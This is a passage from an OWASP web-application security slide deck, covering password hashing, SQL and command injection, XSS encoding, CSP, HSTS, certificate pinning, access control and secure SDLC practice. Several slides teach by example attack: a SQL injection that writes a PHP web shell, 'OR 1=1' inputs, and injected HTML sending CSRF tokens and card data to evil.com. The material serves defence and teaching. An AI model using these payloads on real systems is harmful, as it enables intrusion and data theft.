credential-specific salt
• protect( [salt + password] );
• Use a 32char or 64char salt (actual size
dependent on protection function);
• Do not depend on hiding, splitting, or otherwise
obscuring the salt
44. The OWASP Foundation
http://www.owasp.org
3a) Impose difficult verification on [only] the
attacker
• HMAC-SHA-256
( private key, [salt + password] )
• Protect this key as any private key using best
practices
• Store the key outside the credential store
• Build the password-to-HMAC conversion as a
separate web-service (cryptographic isolation).
45. The OWASP Foundation
http://www.owasp.org
3b) Impose difficult verification on the attacker and
defender (weak/slow)
• PBKDF2( [salt + password], c=10,000,000 );
• Use PBKDF2 when FIPS certification or enterprise
support on many platforms is required
• SCRYPT([salt + password], work factor 10, .5 GB ram)
• Use SCRYPT where resisting any/all hardware
accelerated attacks is necessary but enterprise support
and scale is not
48. The OWASP Foundation
http://www.owasp.org
Forgot Password
Secure Design
Require identity questions
Last name, account number, email, DOB
Enforce lockout policy
Ask one or more good security questions
https://www.owasp.org/index.php/Choosing_and_Using_Secur
ity_Questions_Cheat_Sheet
Send the user a randomly generated token via out-of-band
email, SMS or token
Verify code in same web session
Enforce lockout policy
Change password
Enforce password policy
51. The OWASP Foundation
http://www.owasp.org
Anatomy of SQL Injection Attack
sql = “SELECT * FROM user_table WHERE username = ‘” &
Request(“username”) & “’ AND password = ‘” & Request
(“password”) & ”’”
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password
= ‘password’
52. The OWASP Foundation
http://www.owasp.org
Anatomy of SQL
Injection Attack
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”)
& “ ’ AND password = ‘ ” & Request(“password”) & “ ’ ”
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password =
causes all rows in the users table to be returned!
53. The OWASP Foundation
http://www.owasp.org
Example Attacks
SELECT first_name, last_name FROM users WHERE user_id
= '' UNION ALL SELECT
load_file(‘C:apphtdocswebapp.htaccess'), '1‘
SELECT first_name, last_name FROM users WHERE user_id
='' UNION SELECT '','<?php system($_GET["cmd"]); ?>'
INTO OUTFILE ‘C:apphtdocswebappexploit.php';#
Goto http://bank.com/webapp/exploit.php?cmd=dir
54. The OWASP Foundation
http://www.owasp.org
String Building to
Call Stored Procedures
String building can be done when calling stored procedures as well
sql = “GetCustInfo @LastName=“ +
request.getParameter(“LastName”);
Stored Procedure Code
CREATE PROCEDURE GetCustInfo (@LastName VARCHAR(100))
AS
exec(‘SELECT * FROM CUSTOMER WHERE LNAME=‘’’ + @LastName + ‘’’’) (Wrapped Dynamic SQL)
GO
What’s the issue here…………
If blah’ OR ‘1’=‘1 is passed in as the LastName value, the entire table will be returned
Remember Stored procedures need to be implemented safely. 'Implemented safely'
means the stored procedure does not include any unsafe dynamic SQL generation.
55. The OWASP Foundation
http://www.owasp.org
Rails: ActiveRecord/Database
Security
Rails is designed with minimal SQL Injection problems.
It is not recommended to use user data in a database query in the following manner:
Project.where("name = '#{params[:name]}'")
By entering a parameter with a value such as
‘ OR 1 --
Will result in:
SELECT * FROM projects WHERE name = '' OR 1 --'
56. The OWASP Foundation
http://www.owasp.org
Active Record
Other Injectable examples:
Rails 2.X example:
@projects = Project.find(:all, :conditions => "name like
#{params[:name]}")
Rails 3.X example:
name = params[:name]
@projects = Project.where("name like ' " + name + " ' ");
57. The OWASP Foundation
http://www.owasp.org
Active Record
Countermeasure
Ruby on Rails has a built-in filter for special SQL characters, which will escape ' , " , NULL character and line
breaks.
Using Model.find(id) or Model.find_by_some thing(something) automatically applies this countermeasure.
Model.where("login = ? AND password = ?", entered_user_name, entered_password).first
The "?" characters are placeholders for the parameters which are parameterised and escaped
automatically.
Important:
Many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not
intended to be called with unsafe user input.
A list of them can be found here and such methods should be used with caution.
http://rails-sqli.org/
58. The OWASP Foundation
http://www.owasp.org
Query Parameterization (PHP)
$stmt = $dbh->prepare(”update users set
email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
59. The OWASP Foundation
http://www.owasp.org
Query Parameterization (.NET)
SqlConnection objConnection = new
SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
"SELECT * FROM User WHERE Name = @Name
AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name",
NameTextBox.Text);
objCommand.Parameters.Add("@Password",
PassTextBox.Text);
SqlDataReader objReader =
objCommand.ExecuteReader();
60. The OWASP Foundation
http://www.owasp.org
Query Parameterization (Java)
String newName = request.getParameter("newName") ;
String id = request.getParameter("id");
//SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE
EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
//HQL
Query safeHQLQuery = session.createQuery("from
Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
61. The OWASP Foundation
http://www.owasp.org
Query Parameterization
(Cold Fusion)
<cfquery name="getFirst"
dataSource="cfsnippets">
SELECT * FROM #strDatabasePrefix#_courses
WHERE intCourseID = <cfqueryparam
value=#intCourseID# CFSQLType="CF_SQL_INTEGER">
</cfquery>
62. The OWASP Foundation
http://www.owasp.org
Query Parameterization (PERL)
my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ?
)";
my $sth = $dbh->prepare( $sql );
$sth->execute( $bar, $baz );
63. The OWASP Foundation
http://www.owasp.org
Command
Injection
Web applications may use input parameters as arguments for OS scripts or
executables
Almost every application platform provides a mechanism to execute local
operating system commands from application code
Most operating systems support multiple commands to be executed from the
same command line. Multiple commands are typically separated with the pipe
“|” or ampersand “&” characters
Perl: system(), exec(), backquotes(``)
C/C++: system(), popen(), backquotes(``)
ASP: wscript.shell
Java: getRuntime.exec
MS-SQL Server: master..xp_cmdshell
PHP : include() require(), eval() ,shell_exec
64. The OWASP Foundation
http://www.owasp.org
6
4
6
4
LDAP Injection
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_
(OWASP-DV-006)
SQL Injection
https://www.owasp.org/index.php/SQL_Injection_Prevention_
Cheat_Sheet
https://www.owasp.org/index.php/Query_Parameterization?_
Cheat_Sheet
Command Injection
https://www.owasp.org/index.php/Command_Injection
Where can I learn more?
71. The OWASP Foundation
http://www.owasp.org
XSS Defense by Data
Type and Context
Data Type Context Defense
String HTML Body HTML Entity Encode
String HTML Attribute Minimal Attribute Encoding
String GET Parameter URL Encoding
String Untrusted URL URL Validation, avoid javascript:
URLs, Attribute encoding, safe
URL verification
String CSS Strict structural validation, CSS
Hex encoding, good design
HTML HTML Body HTML Validation (JSoup,
AntiSamy, HTML Sanitizer)
Any DOM DOM XSS Cheat Sheet
Untrusted JavaScript Any Sandboxing
JSON Client Parse Time JSON.parse() or json2.js
Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing,
class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight,
marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan,
scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
72. The OWASP Foundation
http://www.owasp.org
OWASP Java Encoder Project
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
• No third party libraries or configuration necessary.
• This code was designed for high-availability/high-
performance encoding functionality.
• Simple drop-in encoding functionality
• Redesigned for performance
• More complete API (uri and uri component encoding, etc)
in some regards.
• This is a Java 1.5 project.
• Will be the default encoder in the next revision of ESAPI.
• Last updated February 14, 2013 (version 1.1)
73. The OWASP Foundation
http://www.owasp.org
The Problem
Web Page built in Java JSP is vulnerable to XSS
The Solution
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
<%-- Javascript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- Javascript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click
me</button>
74. The OWASP Foundation
http://www.owasp.org
<b><%= Encode.forHtml(UNTRUSTED)%></b>
<p>Title:<%= Encode.forHtml(UNTRUSTED)%></p>
<textarea name="text">
<%= Encode.forHtmlContent(UNTRUSTED) %>
</textarea>
75. The OWASP Foundation
http://www.owasp.org
<input type="text" name="data"
value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
<input type="text" name="data"
value=<%= Encode.forHtmlUnquotedAttribute(UNTRUSTED) %> />
80. The OWASP Foundation
http://www.owasp.org
Other Encoding Libraries
Ruby on Rails
http://api.rubyonrails.org/classes/ERB/Util.html
Reform Project
Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP
https://www.owasp.org/index.php/Category:OWASP_Encoding_Project
ESAPI
PHP.NET, Python, Classic ASP, Cold Fusion
https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_
API
.NET AntiXSS Library
http://wpl.codeplex.com/releases/view/80289
81. The OWASP Foundation
http://www.owasp.org
Nested Contexts Best to avoid:
an element attribute calling a Javascript function etc - parsing chains
<div
onclick="showError('<%=request.getParameter("errorxyz")
%>')" >An error occurred ....</div>
Here we have a HTML attribute(onClick) and within a
nested Javascript function call (showError).
Parsing order:
1: HTML decode the contents of the onclick attribute.
2: When onClick is selected: Javascript Parsing of showError
So we have 2 contexts here...HTML and Javascript (2 browser
parsers).
82. The OWASP Foundation
http://www.owasp.org
We need to apply "layered" encoding in the RIGHT
order:
1) JavaScript encode
2) HTML Attribute Encode so it "unwinds" properly
and is not vulnerable.
<div onclick="showError ('<%=
Encoder.encodeForHtml(Encoder.encodeForJ
avaScript(
request.getParameter("error")%>')))" >An
error occurred ....</div>
83. The OWASP Foundation
http://www.owasp.org
OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• HTML Sanitizer written in Java which lets you include HTML authored by
third-parties in your web application while protecting against XSS.
• This code was written with security best practices in mind, has an
extensive test suite, and has undergone adversarial security review
https://code.google.com/p/owasp-java-html-
sanitizer/wiki/AttackReviewGroundRules.
• Very easy to use.
• It allows for simple programmatic POSITIVE policy configuration (see
below). No XML config.
• Actively maintained by Mike Samuel from Google's AppSec team!
• This is code from the Caja project that was donated by Google. It is
rather high performance and low memory utilization.
85. The OWASP Foundation
http://www.owasp.org
Solving Real World Problems with the OWASP
HTML Sanitizer Project
The Problem
Web Page is vulnerable to XSS because of untrusted HTML
The Solution
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
86. The OWASP Foundation
http://www.owasp.org
OWASP JSON Sanitizer Project
https://www.owasp.org/index.php/OWASP_JSON_Sanitizer
• Given JSON-like content, converts it to valid JSON.
• This can be attached at either end of a data-pipeline to help
satisfy Postel's principle: Be conservative in what you do, be
liberal in what you accept from others.
• Applied to JSON-like content from others, it will produce
well-formed JSON that should satisfy any parser you use.
• Applied to your output before you send, it will coerce minor
mistakes in encoding and make it easier to embed your
JSON in HTML and XML.
87. The OWASP Foundation
http://www.owasp.org
Solving Real World Problems with the OWASP
JSON Sanitizer Project
The Problem
Web Page is vulnerable to XSS because of parsing of untrusted JSON incorrectly
The Solution
JSON Sanitizer can help with two use cases.
1) Sanitizing untrusted JSON on the server that is submitted from the browser in
standard AJAX communication
2) Sanitizing potentially untrusted JSON server-side before sending it to the browser.
The output is a valid Javascript expression, so can be parsed by Javascript's eval
or by JSON.parse.
88. The OWASP Foundation
http://www.owasp.org
DOM-Based XSS Defense
• Untrusted data should only be treated as displayable text
• JavaScript encode and delimit untrusted data as quoted strings
• Use safe API’s like document.createElement("…"),
element.setAttribute("…","value"), element.appendChild(…) and
$(‘#element’).text(…); to build dynamic interfaces
• Avoid use of HTML rendering methods
• Avoid sending any untrusted data to the JS methods that have a
code execution context likeeval(..), setTimeout(..), onclick(..),
onblur(..).
90. The OWASP Foundation
http://www.owasp.org
90
jQuery methods that directly update DOM or can execute
JavaScript
$() or jQuery() .attr()
.add() .css()
.after() .html()
.animate() .insertAfter()
.append() .insertBefore()
.appendTo() Note: .text() updates DOM, but
is safe.
Dangerous jQuery 1.7.2 Data Types
CSS Some Attribute Settings
HTML URL (Potential Redirect)
jQuery methods that accept URLs to potentially unsafe content
jQuery.ajax() jQuery.post()
jQuery.get() load()
jQuery.getScript()
91. The OWASP Foundation
http://www.owasp.org
Contextual encoding is a crucial technique needed to stop all
types of XSS
jqencoder is a jQuery plugin that allows developers to do
contextual encoding in JavaScript to stop DOM-based XSS
http://plugins.jquery.com/plugin-
tags/security
$('#element').encode('html', cdata);
JQuery Encoding with
JQencoder
92. The OWASP Foundation
http://www.owasp.org
Content Security Policy
• Anti-XSS W3C standard
• Content Security Policy latest release version
• http://www.w3.org/TR/CSP/
• Must move all inline script and style into external scripts
• Add the X-Content-Security-Policy response header to
instruct the browser that CSP is in use
- Firefox/IE10PR: X-Content-Security-Policy
- Chrome Experimental: X-WebKit-CSP
- Content-Security-Policy-Report-Only
• Define a policy for the site regarding loading of content
93. The OWASP Foundation
http://www.owasp.org
Get rid of XSS, eh?
A script-src directive that doesn‘t contain ‘unsafe-inline’
eliminates a huge class of cross site scripting
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
95. The OWASP Foundation
http://www.owasp.org
What does this report look like?
{
"csp-report"=> {
"document-uri"=>"http://localhost:3000/home",
"referrer"=>"",
"blocked-uri"=>"ws://localhost:35729/livereload",
"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"
}
}
96. The OWASP Foundation
http://www.owasp.org
{
"csp-report"=> {
"document-uri"=>"http://example.com/welcome",
"referrer"=>"",
"blocked-uri"=>"self",
"violated-directive"=>"inline script base restriction",
"source-file"=>"http://example.com/welcome",
"script-sample"=>"alert(1)",
"line-number"=>81
}
}
What does this report look like?
101. The OWASP Foundation
http://www.owasp.org
X-Frame-Options
HTTP Response Header
// to prevent all framing of this content
response.addHeader( "X-FRAME-OPTIONS", "DENY" );
// to allow framing of this content only by this site
response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" );
// to allow framing from a specific domain
response.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
102. The OWASP Foundation
http://www.owasp.org
Legacy Browser Clickjacking Defense
<style id="antiCJ">body{display:none
!important;}</style>
<script type="text/javascript">
if (self === top) {
var antiClickjack =
document.getElementByID("antiCJ");
antiClickjack.parentNode.removeChild(antiClickjack)
} else {
top.location = self.location;
}
</script>
103. The OWASP Foundation
http://www.owasp.org
Risks of Insecure Communication
• High likelihood of attack
• Open wifi, munipical wifi, malicious ISP
• Easy to exploit
• High impact to user
• Clandestine monitoring of population
• Injection of incorrect/malicious content
• No protection from any defensive systems
• Design flaw in application
104. The OWASP Foundation
http://www.owasp.org
Ex 1: Insecure Session Management
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent cleartext <-- vulnerability point
https://site.com/login
http://site.com/profile
106. The OWASP Foundation
http://www.owasp.org
HTTP Strict Transport Security (HSTS)
• Browser prevents HTTP requests to HSTS site
• Any request to site is “upgraded” to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites
107. The OWASP Foundation
http://www.owasp.org
HSTS – Strict Transport Security
HSTS (Strict Transport Security)
http://www.youtube.com/watch?v=zEV3HOuM_Vw
Strict-Transport-Security: max-age=31536000
• Forces browser to only make HTTPS connection to server
• Must be initially delivered over a HTTPS connection
• You can request that Chromium preloads your websites HSTS
headers by default
• Tweet your domain to @agl__ to be automatically added to
the default Chrome HSTS list!
• http://dev.chromium.org/sts
108. The OWASP Foundation
http://www.owasp.org
HSTS In Code
• Response Header added by application
• Browser receives and remembers settings for domain
• HSTS flag not easily cleared by user
http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security#Implementation
109. The OWASP Foundation
http://www.owasp.org
Benefits of HSTS
• HTTP Strict Transport Security (HSTS)
• Opt-in security control
• Website instructs compatible browser to enable STS for site
• HSTS Forces (for enabled site):
• All communication over HTTPS
• No insecure HTTP requests sent from browser
• No option for user to override untrusted certificates
110. The OWASP Foundation
http://www.owasp.org
Protecting Outdated Users
• HSTS supported in current browsers (Firefox, Chrome)
• No impact to old / unsupported browsers – just no protection
• Older browsers all support SECURE Cookie Flag
• SECURE cookie flag
• Instructs browser to only send cookie over HTTPS
• Much less (and different) protection than HSTS, but good defense in
depth control
111. The OWASP Foundation
http://www.owasp.org
Apple goto fail SSL bug
• Major iOS/OSX SSL implementation bug
• http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-
2014-1266
• "...does not check the signature in a TLS Server Key
Exchange message...."
• "...allows man-in-the-middle attackers to spoof SSL servers
by (1) using an arbitrary private key for the signing step or
(2) omitting the signing step."
113. The OWASP Foundation
http://www.owasp.org
Fixing the CA (Certificate Authority) System
Certificate Pinning
https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Browser Certificate Pruning
Etsy/Zane Lackey
Certificate Creation Transparency
http://certificate-transparency.org
HSTS (Strict Transport Security)
http://www.youtube.com/watch?v=zEV3HOuM_Vw
Strict-Transport-Security: max-age=31536000
114. The OWASP Foundation
http://www.owasp.org
Certificate Pinning
What is Pinning
• Pinning is a key continuity scheme
• Detect when an imposter with a fake but CA validated certificate
attempts to act like the real server
2 Types of pinning
1) Carry around a copy of the server’s public key;
• Great if you are distributing a dedicated client-server application
since you know the server’s certificate or public key in advance
• Note of the server’s public key on first use
2) Trust-on-First-Use, Tofu pinning
• Useful when no a priori knowledge exists, such as SSH or a Browser
• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
115. The OWASP Foundation
http://www.owasp.org
Browser-Based TOFU Pinning
Browser-Based TOFU Pinning
• Trust on First Use
HTTP Public Key Pinning IETF Draft
• http://tools.ietf.org/html/draft-ietf-websec-key-pinning-11
Freezes the certificate in the browser by pushing a fingerprint of the certificate
chain to the browser.
Example:
Public-Key-Pins: pin-
sha1="4n972HfV354KP560yw4uqe/baXc=";
pin-sha1="qvTGHdzF6KLavt4PO0gs2a6pQ00=";
pin-
sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=";
max-age=10000; includeSubDomains
116. The OWASP Foundation
http://www.owasp.org
SSL Resources
• OWASP TLS Protection Cheat Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh
eet
• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
118. The OWASP Foundation
http://www.owasp.org
Virtual Patching
Rationale for Usage
–No Source Code Access
–No Access to Developers
–High Cost/Time to Fix
Benefit
–Reduce Time-to-Fix
–Reduce Attack Surface
119. The OWASP Foundation
http://www.owasp.org
Strategic Remediation
• Ownership is Builders
• Focus on web application root causes of
vulnerabilities and creation of controls in
code
• Ideas during design and initial coding
phase of SDLC
• This takes serious time, expertise and
planning
120. The OWASP Foundation
http://www.owasp.org
Tactical Remediation
• Ownership is Defenders
• Focus on web applications that are
already in production and exposed to
attacks
• Examples include using a Web Application
Firewall (WAF) such as ModSecurity
• Aim to minimize the Time-to-Fix
exposures
123. The OWASP Foundation
http://www.owasp.org
Access Control Anti-Patterns
• Hard-coded role checks in application code
• Lack of centralized access control logic
• Untrusted data driving access control decisions
• Access control that is “open by default”
• Lack of addressing horizontal access control in a
standardized way (if at all)
• Access control logic that needs to be manually
added to every endpoint in code
• Access Control that is “sticky” per session
• Access Control that requires per-user policy
124. The OWASP Foundation
http://www.owasp.org
What is Access Control?
• Authorization is the process where a system determines
if a specific user has access to a resource
• Permission: Represents app behavior only
• Entitlement: What a user is actually allowed to do
• Principle/User: Who/what you are entitling
• Implicit Role: Named permission, user associated
• if (user.isRole(“Manager”));
• Explicit Role: Named permission, resource associated
• if (user.isAuthorized(“report:view:3324”);
125. The OWASP Foundation
http://www.owasp.org
Attacks on Access Control
• Vertical Access Control Attacks
• A standard user accessing administration functionality
• Horizontal Access Control Attacks
• Same role, but accessing another user's private data
• Business Logic Access Control Attacks
• Abuse of one or more linked activities that collectively realize a business
objective
126. The OWASP Foundation
http://www.owasp.org
Access Controls Impact
• Loss of accountability
• Attackers maliciously execute actions as other users
• Attackers maliciously execute higher level actions
• Disclosure of confidential data
• Compromising admin-level accounts often results in access to user’s
confidential data
• Data tampering
• Privilege levels do not distinguish users who can only view data and users
permitted to modify data
129. The OWASP Foundation
http://www.owasp.org
Hard-Coded Roles
• Makes “proving” the policy of an application difficult for
audit or Q/A purposes
• Any time access control policy needs to change, new code
need to be pushed
• RBAC is often not granular enough
• Fragile, easy to make mistakes
130. The OWASP Foundation
http://www.owasp.org
Order- Specific Operations
• Imagine the following parameters
• http://example.com/buy?action=chooseDataPackage
• http://example.com/buy?action=customizePackage
• http://example.com/buy?action=makePayment
• http://example.com/buy?action=downloadData
• Can an attacker control the sequence?
• Can an attacker abuse this with concurrency?
131. The OWASP Foundation
http://www.owasp.org
Rarely Depend on Untrusted Data
• Never trust request data for access control decisions
• Never make access control decisions in JavaScript
• Never make authorization decisions based solely on:
hidden fields
cookie values
form parameters
URL parameters
anything else from the request
• Never depend on the order of values sent from the client
132. The OWASP Foundation
http://www.owasp.org
Best Practice: Centralized AuthZ
• Define a centralized access controller
• ACLService.isAuthorized(PERMISSION_CONSTANT)
• ACLService.assertAuthorized(PERMISSION_CONSTANT)
• Access control decisions go through these simple API’s
• Centralized logic to drive policy behavior and persistence
• May contain data-driven access control policy information
133. The OWASP Foundation
http://www.owasp.org
Best Practice: Code to the Activity
if (AC.hasAccess(“article:edit:12”))
{
//execute activity
}
• Code it once, never needs to change again
• Implies policy is centralized in some way
• Implies policy is persisted in some way
• Requires more design/work up front to get right
134. The OWASP Foundation
http://www.owasp.org
Using a Centralized Access Controller
In Presentation Layer
if (isAuthorized(Permission.VIEW_LOG_PANEL))
{
<h2>Here are the logs</h2>
<%=getLogs();%/>
}
135. The OWASP Foundation
http://www.owasp.org
Using a Centralized Access Controller
In Controller
try (assertAuthorized(Permission.DELETE_USER))
{
deleteUser();
} catch (Exception e) {
//SOUND THE ALARM
}
136. The OWASP Foundation
http://www.owasp.org
SQL Integrated Access Control
Example Feature
http://mail.example.com/viewMessage?msgid=2356342
This SQL would be vulnerable to tampering
select * from messages where messageid = 2356342
Ensure the owner is referenced in the query!
select * from messages where messageid = 2356342 AND
messages.message_owner = <userid_from_session>
137. The OWASP Foundation
http://www.owasp.org
Data Contextual Access Control
Data Contextual / Horizontal Access Control API examples:
ACLService.isAuthorized(“car:view:321”)
ACLService.assertAuthorized(“car:edit:321”)
Long form:
Is Authorized(user, Perm.EDIT_CAR, Car.class, 14)
Check if the user has the right role in the context of a specific
object Protecting data a the lowest level!
138. The OWASP Foundation
http://www.owasp.org
Apache SHIRO
http://shiro.apache.org/
• Apache Shiro is a powerful and easy to use Java
security framework.
• Offers developers an intuitive yet comprehensive
solution to authentication, authorization,
cryptography, and session management.
• Built on sound interface-driven design and OO
principles.
• Enables custom behavior.
• Sensible and secure defaults for everything.
139. The OWASP Foundation
http://www.owasp.org
Solving Real World Access Control Problems
with the Apache Shiro
The Problem
Web Application needs secure access control mechanism
The Solution
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
log.info("You may use a lightsaber ring. Use it wisely.");
} else {
log.info("Sorry, lightsaber rings are for schwartz masters only.");
}
140. The OWASP Foundation
http://www.owasp.org
Solving Real World Access Control Problems
with the Apache Shiro
The Problem
Web Application needs to secure access to a specific object
The Solution
if ( currentUser.isPermitted( "winnebago:drive:" + win_id ) ) {
log.info("You are permitted to 'drive' the 'winnebago' with license plate (id)
'eagle5'. Here are the keys - have fun!");
} else {
log.info("Sorry, you aren't allowed to drive the 'eagle5' winnebago!");
}
141. HTML Hacking
“in the pursuit of browser
friendliness, a bunch of oddities
have manifested”
142. Dangley Quote
<img src='http://evil.com/log.cgi? ← Injected line with a
non-terminated
parameter ...
<input type="hidden" name="xsrf_token" value="12345"> ... ' ← Normally-occurring
apostrophe in page text
...
</div> ← Any normally-
occurring tag
(to provide a closing
bracket)
• Any markup between the opening single quote of the img src parameter and the next occurrence of a
matching quote will be treated as a part of the image URL.
• The browser will issue a request to retrieve the image from the specified location - thereby disclosing the
secret value to an attacker-controlled destination – steal CSRF token
http://evil.com/log.cgi?...<input type="hidden" name="xsrf_token" value="12345">...
143. Form rerouting
<form action='http://evil.com/log.cgi'> ← Injected line by attacker
<form action='update_profile.php'> ← Legitimate, pre-existing form ...
<input type="text" name=“card_number" value=“100100100"> ...
<input type="text" name=“CVV_number" value=“666"> ...
</form>
• The <form> tag can't be nested. The top-level occurrence of this element
always takes precedence over subsequent appearances.
• When used to target forms automatically populated with user-specific secrets
- as would be the case with any forms used to update profile information,
shipping or billing address, or other contact data; form-based XSRF tokens are
also a possible target.
144. <base> jumping
• The <base> tag specifies the base URL/target for
all relative URLs in a document.
• There can be at maximum one <base> element in
a document, and it *must be inside the <head>
element.
http://www.w3.org/wiki/HTML/Elements/base
*VULNERABLE: Chrome, firefox and safari.
NOT VULNERABLE: IE8 or IE9.
145. • Attack relies on the injection of <base> tags
• A majority of web browsers honour this tag outside the
standards-mandated <head> section.
• The attacker injecting this mark-up would be able to change
the semantics of all subsequently appearing relative URLs
<base href='http://evil.com/'> ← Injected line ...
<form action='update_profile.php'> ← Legitimate, pre-existing form ...
<input type="text" name="real_name" value=“admin_eoin"> ...
</form>
http://evil.com/update_profile.ph
FIX: use absolute paths!!
<base> jumping
146. Element Override
• <input> formaction Attribute (HTML5)
• The formaction attribute overrides the action attribute of the
<form> element.
<html>
……
<form action="update_info.php" method=“get">
<input type="text" id="name" />
<input type="text" id="addr" />
<input type="text" id="creditcard" />
<input type="submit"name="submit" id="submit" value="Real Button" />
<!--Beginning of attacker's code -->
<button formaction="http://evil.com"> False Button </button> Add fake button
<style> #submit{visibility:hidden;} </style> hide original button
<!-- End of attacker's code -->
147. Hanging <textarea>
<!--Beginning of attacker's code -->
<form action=“evil.com/logger.cgi" method="post">
<input type="submit" value="Click to continue" />
<textarea style="visibility:hidden;">
<!--End of attacker's code -->
...
<!--User's sensitive data -->
<B>User Password list: </B>
password123
LetMein123
ChangeM3!
1234556
…..
The hanging <textarea> in forces the browser to try to determine where the text area
should terminate. Most browsers look for the next </textarea> or the end of the
</HTML> document.
149. The OWASP Foundation
http://www.owasp.org
Bespoke Applications Vs. Commercial Applications
Application Development internal use:
• Bespoke, customized, one-off application
•Audience is not so great: (Users, developers, test)
Vulnerabilities are not discovered too quickly by users.
Vulnerabilities are discovered by hackers, they actively look for them.
Bespoke application = Small audience = Less chance of vulnerabilities being discovered
This is unlike, Say Microsoft Windows 7 etc……
First Line of Defense:
The Developer:
•Writes the code.
•Understands the problem better than anyone!
•Has the skill set.
•More effective and efficient in providing a
solution
150. The OWASP Foundation
http://www.owasp.org
Complexity Vs
Security
As Functionality and
hence complexity
increase security
decreases.
Integrating security into
functionality at design time
Is easier and cheaper.
“100 Times More Expensive to Fix
Security Bug at Production Than
Design”
– IBM Systems Sciences Institute
It also costs less in the long-term.
-maintenance cost
153. The OWASP Foundation
http://www.owasp.org
A Few Facts and figures
Interesting Statistics – Employing code review
• IBM Reduces 82% of Defects Before Testing Starts
• HP Found 80% of Defects Found Were Not Likely To Be Caught in
Testing
• 100 Times More Expensive to Fix Security Bug at Production Than
Design”
– IBM Systems Sciences Institute
Promoting People Looking at Code
• Improvement Earlier in SDLC
• Fix at Right Place; the Source
• Takes 20% extra time – payoff is order of magnitude more.
154. The OWASP Foundation
http://www.owasp.org
If Cars Were Built Like Applications….
1. 70% of all cars would be built without following the original designs and
blueprints.The other 30% would not have designs.
2. Cars would have no airbags, mirrors, seat belts, doors, roll-bars, side-impact
bars, or locks, because no-one had asked for them. But they would all have at
least six cup holders.
3. Not all the components would be bolted together securely and many of them
would not be built to tolerate even the slightest abuse.
4. Safety tests would assume frontal impact only. Cars would not be roll tested,
or tested for stability in emergency maneuvers, brake effectiveness, side
impact and resistance to theft.
5. Many safety features originally included might be removed before the car was
completed, because they might adversely impact performance.
6. 70% of all cars would be subject to monthly recalls to add major components
left out of the initial production. The other 30% wouldn’t be recalled, because
no-one would sue anyway.
- Denis Verdon
155. The OWASP Foundation
http://www.owasp.org
How do we do it?
Security Analyst
Understand the data and information held in the application
Understand the types of users is half the battle
Involve an analyst starting with the design phase
Developer
Embrace secure application development
Bake security into frameworks when you can
Quality is not just “Does it work”
Security is a measure of quality also
156. The OWASP Foundation
http://www.owasp.org
How do we do it?
(contd)
QA:
Security vulnerabilities are to be considered bugs, the same way
as a functional bug, and tracked in the same manner.
Managers:
Factor some time into the project plan for security.
Consider security as added value in an application.
– $1 spent up front saves $10 during development and $100 after release
157. The OWASP Foundation
http://www.owasp.org
Software security
tollgates in the
SDLC
Requirements
and use cases
Design Test plans
Code
Test
results
Field
feedback
Security
requirements
Risk
analysis
Risk-based
security tests
Static
analysis
(tools)
Penetration
testing
Design
Review
Iterative approach
Code
Review
158. CI (Continuous Integration)
Code changes invoke SAST
Build Pass/Fails
SAST Rules control
Rule Tuning
False Positive Tuning
Framework awareness
159. The OWASP Foundation
http://www.owasp.org
Application Security
Risk Categorization
Goal
